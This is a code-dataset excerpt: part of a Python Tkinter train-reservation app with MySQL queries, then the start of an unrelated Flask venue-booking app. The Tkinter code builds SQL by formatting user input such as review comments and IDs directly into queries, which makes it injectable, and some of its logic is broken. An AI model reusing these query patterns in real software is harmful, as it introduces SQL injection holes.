tree[\"columns\"]=(\"train\", \"dept\", \"arrv\", \"class\", \"pr\", \"bag\", \"name\")\n tree.heading(\"train\", text= \"Train (Train Number)\")\n tree.heading(\"dept\", text= \"Departs From\")\n tree.heading(\"arrv\", text= \"Arrives At\")\n tree.heading(\"class\", text= \"Class\")\n tree.heading(\"pr\", text= \"Price\")\n tree.heading(\"bag\", text= \"# of Baggages\")\n tree.heading(\"name\", text= \"Passenger Name\")\n return tree\n\n def updateDepartureDate(self):\n self.updatedDate = datetime.datetime.strptime(self.date.get(), '%Y-%m-%d')\n\n\n def updateReservation3(self):\n self.updateWin2.withdraw()\n self.updateWin3 = Toplevel()\n self.updateWin3.title(\"Update Reservation\")\n\n frame = Frame(self.updateWin3)\n frame.pack()\n frame2 = Frame(self.updateWin3)\n frame2.pack()\n frame3 = Frame(self.updateWin3)\n frame3.pack()\n frame4 = Frame(self.updateWin3)\n frame4.pack()\n frame5 = Frame(self.updateWin3)\n frame5.pack()\n\n updateIndex = floor(self.w.get()/9)\n updateTuple = self.results[updateIndex]\n\n l1 = Label(frame, text = \"Current Train Ticket\")\n l1.grid(row = 1, column = 1, sticky = E)\n\n i = 0\n tree = self.updateTree2(frame2)\n tree.insert('', i, text='', values=(updateTuple[1], updateTuple[3],updateTuple[6],updateTuple[7], updateTuple[2], updateTuple[8], updateTuple[5],updateTuple[4]))\n newdepDate= Label(frame3,text =\"New Departure Date\")\n newdepDate.grid(row = 0, column = 0, sticky = E)\n self.date = StringVar() ## assume YYYY-MM-DD\n e1= Entry(frame3,textvariable = self.date, width = 10)\n e1.grid(row = 0, column = 1, sticky = EW)\n self.updatedDate = updateTuple[3]\n b1 = Button(frame3, text = \"Search availability\", command = self.updateDepartureDate)\n b1.grid(row = 0, column = 2, sticky = EW)\n\n\n l2 = Label(frame3, text = \"Updated Train Ticket\")\n l2.grid(row = 1, column = 1, sticky = E)\n\n i = 0\n tree2 = self.updateTree3(frame4)\n tree2.insert('', i, text='', values=(updateTuple[1],updateTuple[6],updateTuple[7], updateTuple[2], updateTuple[8], updateTuple[5],updateTuple[4]))\n\n\n\n server = self.Connect()\n cursor = server.cursor()\n query2 = \"SELECT Change_fee FROM SYSTEM_INFO\"\n cursor.execute(query2)\n changefee = cursor.fetchone()\n change_fee = changefee[0]\n query4 = \"SELECT * FROM RESERVES WHERE ReservationID = '%s'\" % (self.resID.get())\n cursor.execute(query4)\n self.results = cursor.fetchall()\n query3 = \"SELECT Total_Cost FROM 
RESERVES WHERE ReservationID='%d' AND Train_Number='%d'\" % (self.resID.get(), self.results[self.index][1])\n cursor.execute(query3)\n totalcost = cursor.fetchone()\n self.total_cost = totalcost[0]\n self.total_cost = self.total_cost + change_fee\n\n changeFee = Label(frame5,text =\"Change Fee\")\n changeFee.grid(row = 0, column = 0, sticky = E)\n self.value = StringVar()\n e2 = Label(frame5,text = change_fee, width = 10)\n e2.grid(row = 0, column = 1, sticky = E)\n updatedCost = Label(frame5,text =\"Updated Total Cost\")\n updatedCost.grid(row = 1, column = 0, sticky = E)\n e3 = Label(frame5, text = self.total_cost, width = 10)\n e3.grid(row = 1, column = 1)\n\n\n b2=Button(frame5, text =\"Back\", command = self.switchUpdateReservation2)\n b2.grid(row =2, column = 0, sticky = E)\n b3=Button(frame5, text =\"Submit\", command = self.submit)\n b3.grid(row =2, column = 1, sticky = E)\n\n\n def submit(self):\n self.updateWin3.destroy()\n server = self.Connect()\n cursor = server.cursor()\n # format the cost with %s so a fractional total is not truncated to an integer\n query1 = \"UPDATE RESERVES SET RESERVES.Departure_Date = '%s', RESERVES.Total_Cost = '%s' WHERE ReservationID='%d' AND Train_Number='%d'\" % (self.updatedDate, self.total_cost, self.resID.get(), self.results[self.index][1])\n cursor.execute(query1)\n cursor.close()\n server.commit()\n server.close()\n self.mainMenu()\n\n def cancelRes(self):\n self.primaryWindow.withdraw()\n self.cancelWin = Toplevel()\n self.cancelWin.title(\"Cancel Reservation\")\n\n frame = Frame(self.cancelWin)\n frame.pack()\n\n l1 = Label(frame, text = \"Reservation ID\")\n l1.grid(row = 0, column = 0, sticky = E)\n self.cancelID = IntVar()\n e1 = Entry(frame, textvariable = self.cancelID, width = 10)\n e1.grid(row = 0, column = 1)\n b1 = Button(frame, text = \"Search\", command = self.cancelRes2)\n b1.grid(row = 0, column = 2, sticky = E)\n b2 = Button(frame, text = \"Back\", command = self.switchToMain)\n b2.grid(row = 1, column = 1, sticky = E)\n\n def switchToMain(self):\n self.cancelWin.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n\n def updateTree4(self, frame):\n tree=Treeview(frame)\n tree.grid(row = 0, column = 0, sticky = E)\n tree[\"show\"] = \"headings\"\n tree[\"columns\"]=(\"train\",\"Date\",\"dept\", \"arrv\", \"class\", \"pr\", \"bag\", \"name\")\n tree.heading(\"train\", text= \"Train (Train Number)\")\n tree.heading(\"Date\", text= \"Date\")\n tree.heading(\"dept\", text= \"Departs From\")\n tree.heading(\"arrv\", text= \"Arrives At\")\n tree.heading(\"class\", text= \"Class\")\n tree.heading(\"pr\", text= \"Price\")\n tree.heading(\"bag\", text= \"# of Baggages\")\n tree.heading(\"name\", text= \"Passenger Name\")\n return tree\n\n def cancelRes2(self):\n self.cancelWin.destroy()\n self.cancelWin2 = Toplevel()\n self.cancelWin2.title(\"Cancel Reservation\")\n\n frame = Frame(self.cancelWin2)\n frame.pack()\n frame2 = Frame(self.cancelWin2)\n frame2.pack()\n frame3 = Frame(self.cancelWin2)\n frame3.pack()\n\n server = self.Connect()\n cursor = server.cursor()\n query = \"SELECT * FROM RESERVES WHERE ReservationID = '%s'\" % (self.cancelID.get())\n cursor.execute(query)\n self.results = cursor.fetchall()\n if len(self.results) == 0:\n messagebox.showerror(\"Error\", \"Reservation already cancelled, cannot cancel again\")\n self.cancelWin2.destroy()\n self.cancelRes()\n return\n\n i = 0\n self.delPrice = 0\n tree = self.updateTree4(frame)\n dates = []\n for res in self.results:\n tree.insert('', i, text='', values=(res[1], res[3], res[6],res[7], res[2], res[8], res[5],res[4]))\n 
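# running total of the reservation's cost; the earliest departure date gathered here drives the refund tiers below\n 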
self.delPrice += res[8]\n dates.append(res[3])\n i += 1\n self.departDate = min(dates)\n\n l1= Label(frame2,text =\"Total Cost of Reservation\")\n l1.grid(row = 1, column = 0, sticky = E)\n\n e1= Label(frame2,text = self.delPrice, width = 10)\n e1.grid(row = 1, column = 1, sticky = EW)\n\n #self.cancelDate = datetime.today()\n self.cancelDate = datetime.date.today()\n l2 = Label(frame2, text = \"Date of Cancellation\")\n l2.grid(row = 2, column = 0, sticky = E)\n e2= Label(frame2,text = self.cancelDate, width = 10)\n e2.grid(row = 2, column = 1, sticky = EW)\n\n # reject cancellations within a day of departure first, then apply the refund tiers and clamp at zero\n if self.cancelDate > (self.departDate - datetime.timedelta(1)):\n self.refund = 0\n messagebox.showerror(\"Error\", \"Cannot cancel reservation within a day of departure date\")\n self.cancelWin2.destroy()\n self.cancelRes()\n return\n elif self.cancelDate < (self.departDate - datetime.timedelta(7)):\n self.refund = float(self.delPrice) * 0.8 - 50.0\n else:\n self.refund = float(self.delPrice) * 0.5 - 50\n if self.refund < 0:\n self.refund = 0\n\n l3 = Label(frame2, text = \"Amount to be Refunded\")\n l3.grid(row = 3, column = 0, sticky = E)\n e2= Label(frame2,text = self.refund, width = 10)\n e2.grid(row = 3, column = 1, sticky = EW)\n\n b2=Button(frame3, text =\"Back\", command = self.switchCancelRes1)\n b2.grid(row =4, column = 0, sticky = E)\n\n b3=Button(frame3, text =\"Submit\", command = self.switchTC)\n b3.grid(row =4, column = 1, sticky = E)\n\n def switchCancelRes1(self):\n self.cancelWin2.destroy()\n self.cancelRes()\n\n def switchTC(self):\n server = self.Connect()\n cursor = server.cursor()\n\n query = \"SELECT Is_cancelled, MIN(Departure_Date) FROM RESERVATION, RESERVES WHERE RESERVES.ReservationID = '%d' AND RESERVATION.ReservationID = '%d'\" % (self.cancelID.get(), self.cancelID.get())\n cursor.execute(query)\n results = cursor.fetchall()\n\n queryCancel = \"UPDATE RESERVATION SET Is_cancelled = 1 WHERE ReservationID = '%d'\" % (self.cancelID.get())\n cursor.execute(queryCancel)\n query = \"DELETE FROM RESERVES WHERE RESERVES.ReservationID = '%d'\" % (self.cancelID.get())\n cursor.execute(query)\n\n cursor.close()\n server.commit()\n server.close()\n self.cancelWin2.destroy()\n self.primaryWindow.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n\n def viewReview(self):\n self.primaryWindow.withdraw()\n self.viewReviewWin = Toplevel()\n self.viewReviewWin.title(\"View Review\")\n\n frame = Frame(self.viewReviewWin)\n frame.pack()\n\n self.TrainReviewNumber = IntVar()\n l1 = Label(frame, text = \"Train Number\")\n l1.grid(row = 0, column = 0, sticky = W)\n e1 = Entry(frame, textvariable = self.TrainReviewNumber, width = 20)\n e1.grid(row = 0, column = 1)\n b1 = Button(frame, text = \"Back\", command = self.backMain)\n b1.grid(row = 1, column = 0)\n b2 = Button(frame, text = \"Next\", command = self.viewReview2)\n b2.grid(row = 1, column = 1)\n\n def backMain(self):\n self.viewReviewWin.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n\n def viewTree(self, frame):\n tree=Treeview(frame)\n tree.pack()\n tree[\"show\"] = \"headings\"\n tree[\"columns\"]=(\"select\",\"train\",\"time\",\"dept\", \"arrv\", \"class\", \"pr\", \"bag\", \"name\")\n tree.heading(\"select\", text= \"Select\")\n tree.heading(\"train\", text= \"Train (Train Number)\")\n tree.heading(\"time\", text= \"Time (Duration)\")\n tree.heading(\"dept\", text= \"Departs From\")\n tree.heading(\"arrv\", text= 
\"Arrives At\")\n tree.heading(\"class\", text= \"Class\")\n tree.heading(\"pr\", text= \"Price\")\n tree.heading(\"bag\", text= \"# of baggages\")\n tree.heading(\"name\", text= \"Passenger Name\")\n return tree\n\n def viewReview2(self):\n self.viewReviewWin.withdraw()\n self.viewReviewWin2 = Toplevel()\n self.viewReviewWin2.title(\"View Review\")\n\n frame = Frame(self.viewReviewWin2)\n frame.pack()\n\n server = self.Connect()\n cursor = server.cursor()\n query = \"SELECT Comment, Rating FROM REVIEW WHERE REVIEW.Train_Number = '%d'\" % (TrainReviewNumber)\n cursor.execute(query)\n results = cursor.fetchall()\n\n tree = self.viewTree(frame)\n\n b1 = Button(frame, text = \"Back to Choose Functionality\", command = self.switchMainMenu)\n b1.pack(side = BOTTOM)\n\n def switchMainMenu(self):\n self.viewReviewWin2.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n\n def giveReview(self):\n self.primaryWindow.destroy()\n self.giveReviewWin = Toplevel()\n self.giveReviewWin.title(\"Give Review\")\n\n frame = Frame(self.giveReviewWin)\n frame.pack()\n\n self.trainNo = IntVar()\n l1 = Label(frame, text = \"Train Number\")\n l1.grid(row = 0, column = 0, sticky = W)\n e1 = Entry(frame, textvariable = self.trainNo, width = 20)\n e1.grid(row = 0, column = 1)\n\n l2 = Label(frame, text = \"Rating\")\n l2.grid(row = 1, column = 0, sticky = W)\n self.rating = StringVar()\n self.cho = [\"Very Good\", \"Good\", \"Neutral\", \"Bad\", \"Very Bad\"]\n\n option = OptionMenu(frame, self.rating, self.cho[0], *self.cho)\n option.grid(row = 1, column = 1)\n\n self.comment = StringVar()\n l3 = Label(frame, text = \"Comment\")\n l3.grid(row = 2, column = 0, sticky = W)\n e3 = Entry(frame, textvariable = self.comment, width = 20)\n e3.grid(row = 2, column = 1)\n\n b1=Button(frame, text =\"Submit\", command = self.verifyRev)\n b1.grid(row = 3, column = 1)\n\n\n def verifyRev(self):\n if self.trainNo == \"\":\n messagebox.showerror(\"Error\", \"Enter a train number\")\n if self.trainNo == \"\" or self.rating == \"\":\n messagebox.showerror(\"Error\", \"Train Number and Rating cannot be left blank.\")\n else:\n self.rate = 5\n if self.rating.get() == self.cho[0]:\n self.rate = 5\n elif self.rating.get() == self.cho[1]:\n self.rate = 4\n elif self.rating.get() == self.cho[2]:\n self.rate = 3\n elif self.rating.get() == self.cho[3]:\n self.rate = 2\n elif self.rating.get() == self.cho[4]:\n self.rate = 1\n\n server = self.Connect()\n cursor = server.cursor()\n queryFrom = \"SELECT MAX(Review_Number) FROM REVIEW\"\n cursor.execute(queryFrom)\n result = cursor.fetchall()\n\n query = \"INSERT INTO REVIEW(Review_Number, Comment, Rating, Username, Train_Number) VALUES ('%d', '%s', '%d', '%s', '%d')\" % (result[0][0] + 1, self.comment.get(), self.rate, self.username.get(), self.trainNo.get())\n cursor.execute(query)\n server.commit()\n cursor.close()\n server.close()\n self.giveReviewWin.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n ################ check to see if the train number is valid###############################\n def mainBack(self):\n if self.trainNo == \"\":\n messagebox.showerror(\"Error\", \"Enter a train number\")\n ######elif ##train number isnt correct:\n else:\n self.giveReviewWin.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n ###########write the rating to a DB#################\n\n\n def viewTree2(self, frame):\n tree=Treeview(frame)\n tree.pack()\n tree[\"show\"] = \"headings\"\n tree[\"columns\"]=(\"mon\",\"rev\")\n tree.heading(\"mon\", text= \"Month\")\n 
tree.heading(\"rev\", text= \"Revenue\")\n return tree\n\n def viewRevenueRep(self):\n self.primaryWindow.withdraw()\n self.viewRevenueReport = Toplevel()\n self.viewRevenueReport.title(\"View Revenue Report\")\n\n frame = Frame(self.viewRevenueReport)\n frame.pack()\n\n current = datetime.datetime.now().strftime(\"%Y-%m-01\")\n backOne = (datetime.datetime.now() - datetime.timedelta(30)).strftime(\"%Y-%m-01\")\n backTwo = (datetime.datetime.now() - datetime.timedelta(60)).strftime(\"%Y-%m-01\")\n backThree = (datetime.datetime.now() - datetime.timedelta(90)).strftime(\"%Y-%m-01\")\n\n\n if backOne == \"01\":\n backOneShow = \"January\"\n if backOne == \"02\":\n backOneShow = \"February\"\n if backOne == \"03\":\n backOneShow = \"March\"\n if backOne == \"04\":\n backOneShow = \"April\"\n if backOne == \"05\":\n backOneShow = \"May\"\n if backOne == \"06\":\n backOneShow = \"June\"\n if backOne == \"07\":\n backOneShow = \"July\"\n if backOne == \"08\":\n backOneShow = \"August\"\n if backOne == \"09\":\n backOneShow = \"September\"\n if backOne == \"10\":\n backOneShow = \"October\"\n if backOne == \"11\":\n backOneShow = \"November\"\n if backOne == \"12\":\n backOneShow = \"December\"\n\n\n if backTwo == \"01\":\n backTwoShow = \"January\"\n if backTwo == \"02\":\n backTwoShow = \"February\"\n if backTwo == \"03\":\n backTwoShow = \"March\"\n if backTwo == \"04\":\n backTwoShow = \"April\"\n if backTwo == \"05\":\n backTwoShow = \"May\"\n if backTwo == \"06\":\n backTwoShow = \"June\"\n if backTwo == \"07\":\n backTwoShow = \"July\"\n if backTwo == \"08\":\n backTwoShow = \"August\"\n if backTwo == \"09\":\n backTwoShow = \"September\"\n if backTwo == \"10\":\n backTwoShow = \"October\"\n if backTwo == \"11\":\n backTwoShow = \"November\"\n if backTwo == \"12\":\n backTwoShow = \"December\"\n\n if backThree == \"01\":\n backThreeShow = \"January\"\n if backThree == \"02\":\n backThreeShow = \"February\"\n if backThree == \"03\":\n backThreeShow = \"March\"\n if backThree == \"04\":\n backThreeShow = \"April\"\n if backThree == \"05\":\n backThreeShow = \"May\"\n if backThree == \"06\":\n backThreeShow = \"June\"\n if backThree == \"07\":\n backThreeShow = \"July\"\n if backThree == \"08\":\n backThreeShow = \"August\"\n if backThree == \"09\":\n backThreeShow = \"September\"\n if backThree == \"10\":\n backThreeShow = \"October\"\n if backThree == \"11\":\n backThreeShow = \"November\"\n if backThree == \"12\":\n backThreeShow = \"December\"\n\n server = self.Connect()\n cursor = server.cursor()\n query1 = \"SELECT SUM(Total_Cost) FROM RESERVES WHERE Departure_Date > '%s' AND Departure_Date < '%s'\" % (backThree, backTwo)\n query2 = \"SELECT SUM(Total_Cost) FROM RESERVES WHERE Departure_Date > '%s' AND Departure_Date < '%s'\" % (backTwo, backOne)\n query3 = \"SELECT SUM(Total_Cost) FROM RESERVES WHERE Departure_Date > '%s' AND Departure_Date < '%s'\" % (backOne, current)\n cursor.execute(query1)\n result1 = cursor.fetchall()\n cursor.execute(query2)\n result2 = cursor.fetchall()\n cursor.execute(query3)\n result3 = cursor.fetchall()\n\n tree = self.viewTree2(frame)\n tree.insert('', 0, text='', values=(backThreeShow, result1[0][0]))\n tree.insert('', 1, text='', values=(backTwoShow, result2[0][0]))\n tree.insert('', 2, text='', values=(backOneShow, result3[0][0]))\n\n b1 = Button(frame, text = \"Back\", command = self.switchMain)\n b1.pack(side = BOTTOM)\n\n def switchMain(self):\n self.viewRevenueReport.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n\n def 
viewTree3(self, frame):\n tree=Treeview(frame)\n tree.pack()\n tree[\"show\"] = \"headings\"\n tree[\"columns\"]=(\"mon\",\"num\",\"rsv\")\n tree.heading(\"mon\", text= \"Month\")\n tree.heading(\"num\", text= \"Train number\")\n tree.heading(\"rsv\", text= \"#of Reservations\")\n return tree\n\n def topThreeRoutes(self, cursor, server, idx, startDate, endDate):\n # count distinct non-cancelled reservations per train for one month window and return the top three (route, count) pairs\n queryMonth = \"CREATE VIEW Month%d (Reservations, TNumber) AS SELECT ReservationID, Train_Number FROM RESERVATION NATURAL JOIN RESERVES WHERE Is_cancelled = '0' AND Departure_Date > '%s' AND Departure_Date < '%s'\" % (idx, startDate, endDate)\n cursor.execute(queryMonth)\n queryHere = \"SELECT TNumber, COUNT(DISTINCT Reservations) FROM Month%d GROUP BY TNumber\" % (idx)\n cursor.execute(queryHere)\n tempResults = cursor.fetchall()\n queryPerTrain = \"CREATE TABLE PerTrain%d(Route INT(10), Num INT(10))\" % (idx)\n cursor.execute(queryPerTrain)\n for result in tempResults:\n queryFillTrain = \"INSERT INTO PerTrain%d(Route, Num) VALUES ('%d', '%d')\" % (idx, result[0], result[1])\n cursor.execute(queryFillTrain)\n server.commit()\n results = []\n for i in range(3):\n # scan for the current maximum, record it, then delete that row so the next pass finds the runner-up\n queryAll = \"SELECT * FROM PerTrain%d\" % (idx)\n cursor.execute(queryAll)\n rows = cursor.fetchall()\n maxTup = (0, 0)\n for row in rows:\n if row[1] > maxTup[1]:\n maxTup = (row[0], row[1])\n results.append(maxTup)\n queryNext = \"DELETE FROM PerTrain%d ORDER BY Num DESC LIMIT 1\" % (idx)\n cursor.execute(queryNext)\n return results\n\n def viewpopRR(self):\n # report layout: one row per (month, route, reservation count), with the three busiest routes for each of the last three months\n self.primaryWindow.withdraw()\n self.viewpopRRWin = Toplevel()\n self.viewpopRRWin.title(\"View Popular Route Report\")\n frame = Frame(self.viewpopRRWin)\n frame.pack()\n\n current = datetime.datetime.now().strftime(\"%Y-%m-01\")\n backOne = (datetime.datetime.now() - datetime.timedelta(30)).strftime(\"%Y-%m-01\")\n backTwo = (datetime.datetime.now() - datetime.timedelta(60)).strftime(\"%Y-%m-01\")\n backThree = (datetime.datetime.now() - datetime.timedelta(90)).strftime(\"%Y-%m-01\")\n\n backOneShow = self.monthName(backOne[5:7])\n backTwoShow = self.monthName(backTwo[5:7])\n backThreeShow = self.monthName(backThree[5:7])\n\n server = self.Connect()\n cursor = server.cursor()\n results1 = self.topThreeRoutes(cursor, server, 1, backThree, backTwo)\n results2 = self.topThreeRoutes(cursor, server, 2, backTwo, backOne)\n results3 = self.topThreeRoutes(cursor, server, 3, backOne, current)\n\n queryDrop11 = \"DROP VIEW Month1\"\n queryDrop12 = \"DROP TABLE PerTrain1\"\n queryDrop21 = \"DROP VIEW Month2\"\n queryDrop22 = \"DROP TABLE PerTrain2\"\n queryDrop31 = \"DROP VIEW Month3\"\n queryDrop32 = \"DROP TABLE PerTrain3\"\n 
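# drop the per-month helper views and tables so the report can be rebuilt on the next visit\n 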
cursor.execute(queryDrop11)\n cursor.execute(queryDrop12)\n cursor.execute(queryDrop21)\n cursor.execute(queryDrop22)\n cursor.execute(queryDrop31)\n cursor.execute(queryDrop32)\n server.commit()\n cursor.close()\n server.close()\n\n tree = self.viewTree3(frame)\n tree.insert('', 0, text='', values=(backThreeShow, results1[0][0], results1[0][1]))\n tree.insert('', 1, text='', values=(backThreeShow, results1[1][0], results1[1][1]))\n tree.insert('', 2, text='', values=(backThreeShow, results1[2][0], results1[2][1]))\n tree.insert('', 3, text='', values=(backTwoShow, results2[0][0], results2[0][1]))\n tree.insert('', 4, text='', values=(backTwoShow, results2[1][0], results2[1][1]))\n tree.insert('', 5, text='', values=(backTwoShow, results2[2][0], results2[2][1]))\n tree.insert('', 6, text='', values=(backOneShow, results3[0][0], results3[0][1]))\n tree.insert('', 7, text='', values=(backOneShow, results3[1][0], results3[1][1]))\n tree.insert('', 8, text='', values=(backOneShow, results3[2][0], results3[2][1]))\n\n b1 = Button(frame, text = \"Back\", command = self.swtMain)\n b1.pack(side = BOTTOM)\n\n\n def swtMain(self):\n self.viewpopRRWin.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n\nmw = Tk()\napp = Phase_three(mw)\nmw.mainloop()\n","repo_name":"achiang31/Train_4400","sub_path":"p3.py","file_name":"p3.py","file_ext":"py","file_size_in_byte":73124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"39782305374","text":"#----------------------------------------------------------------------------#\n# Imports\n#----------------------------------------------------------------------------#\n\nimport json\nimport dateutil.parser\nimport babel\nfrom flask import Flask, render_template, request, Response, flash, redirect, url_for\nfrom flask_moment import Moment\nfrom flask_sqlalchemy import SQLAlchemy\nimport logging\nfrom logging import Formatter, FileHandler\nfrom flask_wtf import Form\nfrom forms import *\n\nfrom datetime import datetime\n#----------------------------------------------------------------------------#\n# App Config.\n#----------------------------------------------------------------------------#\n\napp = Flask(__name__)\nmoment = Moment(app)\napp.config.from_object('config')\ndb = SQLAlchemy(app)\n\n# TODO: connect to a local postgresql database\n# --> Done. Please check details in config.py\n\nfrom flask_migrate import Migrate\nmigrate = Migrate(app, db)\n\n\n#----------------------------------------------------------------------------#\n# Models.\n#----------------------------------------------------------------------------#\n\nclass Venue(db.Model):\n __tablename__ = 'venues'\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String)\n city = db.Column(db.String(120))\n state = db.Column(db.String(120))\n address = db.Column(db.String(120))\n phone = db.Column(db.String(120))\n image_link = db.Column(db.String(500))\n facebook_link = db.Column(db.String(120))\n\n # TODO: implement any missing fields, as a database migration using Flask-Migrate\n # done. 
added columns: genres, website_link, seeking_talent, seeking_description, and relations: shows\n genres = db.Column(db.String(120))\n website_link = db.Column(db.String(120))\n seeking_talent = db.Column(db.Boolean, default=False)\n seeking_description = db.Column(db.String(120))\n shows = db.relationship('Show', backref='venue', lazy=True)\n \n def __repr__(self):\n return \"<Venue %s %s>\" % (self.id, self.name)\n\nclass Artist(db.Model):\n __tablename__ = 'artists'\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String)\n city = db.Column(db.String(120))\n state = db.Column(db.String(120))\n phone = db.Column(db.String(120))\n genres = db.Column(db.String(120))\n image_link = db.Column(db.String(500))\n facebook_link = db.Column(db.String(120))\n\n # TODO: implement any missing fields, as a database migration using Flask-Migrate\n # done. added columns: website_link, seeking_venue, seeking_description, and relations: shows\n website_link = db.Column(db.String(120))\n seeking_venue = db.Column(db.Boolean, default=False)\n seeking_description = db.Column(db.String(120))\n shows = db.relationship('Show', backref='artist', lazy=True)\n \n def __repr__(self):\n return \"<Artist %s %s>\" % (self.id, self.name)\n\n# TODO Implement Show and Artist models, and complete all model relationships and properties, as a database migration.\n# done. Check details in each model class\n\n\nclass Show(db.Model):\n __tablename__ = 'shows'\n\n id = db.Column(db.Integer, primary_key=True)\n artist_id = db.Column(db.Integer, db.ForeignKey('artists.id'), nullable=False)\n venue_id = db.Column(db.Integer, db.ForeignKey('venues.id'), nullable=False)\n # pass the callable (no parentheses) so the default is evaluated per insert, not once at import time\n start_time = db.Column(db.DateTime, default=datetime.now, nullable=False)\n\n def __repr__(self):\n return \"<Show %s %s %s %s>\" % (self.id, self.artist_id, self.venue_id, self.start_time)\n\n#----------------------------------------------------------------------------#\n# Filters.\n#----------------------------------------------------------------------------#\nfrom babel.dates import format_datetime\n\ndef format_datetime(value, format='medium'):\n # instead of just date = dateutil.parser.parse(value)\n # added if/else to handle a datetime input\n if isinstance(value, str):\n date = dateutil.parser.parse(value)\n else:\n date = value\n if format == 'full':\n format=\"EEEE MMMM, d, y 'at' h:mma\"\n elif format == 'medium':\n format=\"EE MM, dd, y h:mma\"\n return babel.dates.format_datetime(date, format, locale='en')\n\napp.jinja_env.filters['datetime'] = format_datetime\n\n#----------------------------------------------------------------------------#\n# Controllers.\n#----------------------------------------------------------------------------#\n\n@app.route('/')\ndef index():\n return render_template('pages/home.html')\n\n\n# Venues\n# ----------------------------------------------------------------\n\n@app.route('/venues')\ndef venues():\n # TODO: replace with real venues data.\n # num_upcoming_shows should be aggregated based on number of upcoming shows per venue.\n # find all city/state\n cityState = db.session.query(Venue.city, Venue.state).distinct(Venue.city, Venue.state)\n ans = [] \n for cs in cityState:\n venue_info = Venue.query.filter_by(state = cs.state).filter_by(city = cs.city).all()\n venue_detail = []\n for ven in venue_info:\n venue_detail.append({'id': ven.id, \n 'name': ven.name, \n 'num_upcoming_shows': len( db.session.query(Show).filter(Show.start_time > datetime.now(), Show.venue_id == ven.id).all() )})\n ans.append( {'city': cs.city, 'state': cs.state, 
'venues': venue_detail} ) \n \n return render_template('pages/venues.html', areas=ans)\n\n@app.route('/venues/search', methods=['POST'])\ndef search_venues():\n # TODO: implement search on venues with partial string search. Ensure it is case-insensitive.\n # search for Hop should return \"The Musical Hop\".\n # search for \"Music\" should return \"The Musical Hop\" and \"Park Square Live Music & Coffee\"\n response = {}\n search_term = request.form.get('search_term', '')\n venues = Venue.query.filter(Venue.name.ilike(\"%\" + search_term + \"%\")).all()\n data = []\n for venue in venues:\n data.append( {\"id\": venue.id, \n 'name': venue.name, \n 'num_upcoming_shows': len( db.session.query(Show).filter(Show.start_time > datetime.now(), Show.venue_id == venue.id).all() )} )\n response['count'] = len(data)\n response['data'] = data\n return render_template('pages/search_venues.html', results=response, search_term=search_term)\n\n@app.route('/venues/<int:venue_id>')\ndef show_venue(venue_id):\n # shows the venue page with the given venue_id\n # TODO: replace with real venue data from the venues table, using venue_id\n # done.\n venue = Venue.query.get(venue_id)\n genres = venue.genres.replace('{', '').replace('}', '').split(',')\n data = {\"id\": venue.id,\n \"name\": venue.name,\n \"genres\": genres,\n \"address\": venue.address,\n \"city\": venue.city,\n \"state\": venue.state,\n \"phone\": venue.phone,\n \"website\": venue.website_link,\n \"facebook_link\": venue.facebook_link,\n \"seeking_talent\": venue.seeking_talent,\n \"seeking_description\": venue.seeking_description,\n \"image_link\": venue.image_link,\n \"past_shows\": [],\n \"upcoming_shows\": [],\n \"past_shows_count\": 0,\n \"upcoming_shows_count\": 0,\n }\n # past shows\n past_shows_list = []\n past_shows_db = Show.query.filter(Show.start_time < datetime.now(), Show.venue_id == venue_id).all()\n for show in past_shows_db:\n artist = Artist.query.get(show.artist_id)\n past_shows_list.append( {'artist_id': show.artist_id, 'artist_name': artist.name, 'artist_image_link': artist.image_link ,'start_time': show.start_time} )\n # future shows\n future_shows_list = []\n future_shows_db = Show.query.filter(Show.start_time >= datetime.now(), Show.venue_id == venue_id).all()\n for show in future_shows_db:\n artist = Artist.query.get(show.artist_id)\n future_shows_list.append( {'artist_id': show.artist_id, 'artist_name': artist.name, 'artist_image_link': artist.image_link ,'start_time': show.start_time} ) \n data['past_shows'] = past_shows_list\n data['upcoming_shows'] = future_shows_list\n data['past_shows_count'] = len(past_shows_list)\n data['upcoming_shows_count'] = len(future_shows_list)\n return render_template('pages/show_venue.html', venue=data)\n\n# Create Venue\n# ----------------------------------------------------------------\n\n@app.route('/venues/create', methods=['GET'])\ndef create_venue_form():\n form = VenueForm()\n return render_template('forms/new_venue.html', form=form)\n\n@app.route('/venues/create', methods=['POST'])\ndef create_venue_submission():\n # TODO: insert form data as a new Venue record in the db, instead\n # TODO: modify data to be the data object returned from db insertion\n # done.\n try: \n venue = Venue(name = request.form['name'],\n city = request.form['city'],\n state = request.form['state'],\n address = request.form['address'],\n phone = request.form['phone'],\n image_link = request.form['image_link'],\n facebook_link = request.form['facebook_link'],\n genres = request.form.getlist('genres'),\n website_link = 
request.form['website_link'],\n seeking_talent = request.form.get('seeking_talent') == 'y',\n seeking_description = request.form['seeking_description'] )\n db.session.add(venue)\n db.session.commit() \n # on successful db insert, flash success\n flash('Venue ' + request.form['name'] + ' was successfully listed!')\n except:\n db.session.rollback()\n flash('An error occurred. Venue ' + request.form['name'] + ' could not be listed.')\n finally:\n db.session.close()\n return render_template('pages/home.html')\n\n@app.route('/venues/<int:venue_id>', methods=['DELETE'])\ndef delete_venue(venue_id):\n # TODO: Complete this endpoint for taking a venue_id, and using\n # SQLAlchemy ORM to delete a record. Handle cases where the session commit could fail.\n # done.\n try:\n Venue.query.filter_by(id=venue_id).delete()\n db.session.commit()\n except:\n db.session.rollback()\n finally:\n db.session.close()\n\n # BONUS CHALLENGE: Implement a button to delete a Venue on a Venue Page, have it so that\n # clicking that button delete it from the db then redirect the user to the homepage\n # please check show_venue.html for details\n return render_template('pages/home.html')\n\n# Artists\n# ----------------------------------------------------------------\n@app.route('/artists')\ndef artists():\n # TODO: replace with real data returned from querying the database\n # done.\n data = Artist.query.all()\n artists = []\n for art in data:\n artists.append( {'id': art.id, 'name': art.name} )\n return render_template('pages/artists.html', artists=artists)\n\n@app.route('/artists/search', methods=['POST'])\ndef search_artists():\n # TODO: implement search on artists with partial string search. Ensure it is 